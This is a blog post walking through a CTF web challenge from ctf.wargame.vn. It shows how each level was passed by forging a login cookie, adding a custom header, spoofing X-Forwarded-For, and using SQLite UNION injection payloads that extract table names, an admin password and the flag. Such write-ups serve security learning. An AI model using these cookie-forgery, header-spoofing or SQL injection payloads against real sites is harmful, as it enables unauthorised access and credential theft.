Saturday, July 27, 2013

ctf.wargame.vn teaser round web100

This challenge is also quite simple which need you to pay more attention to what server send to and get from your browser.
What a host give us a hint is:
có 7 levels :) + Level 6-7 dùng SQLite

Level 7: Bạn phải đoán đc câu query là gì :).Hãy thử %29 %22
Các level khác: tìm hiểu PHP và Apache :).

In this challenge, i use only web browser (firefox or iceweasel) with some addons and burpsuite to modify packets before they are sent.
Let's start with the link
http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/

It works!..

Basically, it seems that website is not complete. Try to open page source. Nothing special in source except there is a vertical scroll bar. Let's try to scroll down to a bottom. Here, a level 2 link is hidden here. This one is always a trick to some players.

Let's keep to level2 with the link we have in the previous level.

You're not logged in!

wtf, why aren't not logged in?There is no form for us to authenticate. There must be another way to make server believe that we are logged. One way to do this is by using cookie. We need to send cookie to server to let it know we are already logged in. Using cookie manager, a firefox addon, gives us nothing, there is no cookie store already. Next, let's check what server send to us by using live http header, another firefox's addon. (thanks ML for this hint, I dont even think that i need to examine what server send becase of my little ctf experience)

Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT

That's explain why there is no cookie stored in our browser. The job is easy now by set cookie login to 1 and set our request to server to get next level link

in level3, we do the same way as level2 instead of set login cookie to ip address which is hidden in page source of this level.

Level 4 requires more challenge than the first 3 levels. Open source page and we get an array of server variables and a hidden variable

I have to guess that to pass this level, we need to set server variable HTTP_1337 to 1337.
What you need to do this level, you need to understand what server variable is and how it gets from request. (http://www.php.net/manual/en/reserved.variables.server.php)
insert the folowing line in to request's HTTP header before it is sent to server
1337:1337

Level5 is also the same as level4. We need to change our IP address ($_SERVER['REMOTE_ADDR']) to 127.0.0.1 which seems impossible.  Just using google and found interesting http://en.wikipedia.org/wiki/X-Forwarded-For

Move to the next level. This level is no more php exploit. It requires sql injection skill.
?id=1
Hello manhluat!

Try to change value to see whether there is exploitable.
?id=1'
Nothing ...

so, there may be injectable. Do some more SQLis
id=-1 union select 1,1,1;--
Hello 1!

It works! Now, it is time to exploit this level. We know this level uses SQLlite; therefore using following query to get table name
?id=-1 union select 1,name,1 from sqlite_master WHERE type='table' ;--

Hello users!

We get the table users.

?id=-1 union select 1,username,1 from users ;--
Hello admin!

?id=-1 union select 1,password,1 from users where username='admin';--
Hello ....(level7 link)!

Following the link, we reach level 7.In this level 7, the host give us some hints by using %27 and % 29 which stand for " and ) character.


?id=-1
Hello!
?id=-1"
Nothing... ->There must be error with sql query
?id=-1")
Nothing...
?id=-1");--
Hello!

Ok, now we guest the query should be: select ... from ... where (id="xxx")

let's do some more
?id=-1") union select 1,1,1 where ("1"="1
Hello 1!

ok. Now we know how to pass this level. Do as what we do in the previous level.
?id=-1") union select 1,name,1 from sqlite_master where ("1"="1

Hello flag!

?id=-1") union select 1,flag,1 from flag where ("1"="1

Done.

No comments:

Post a Comment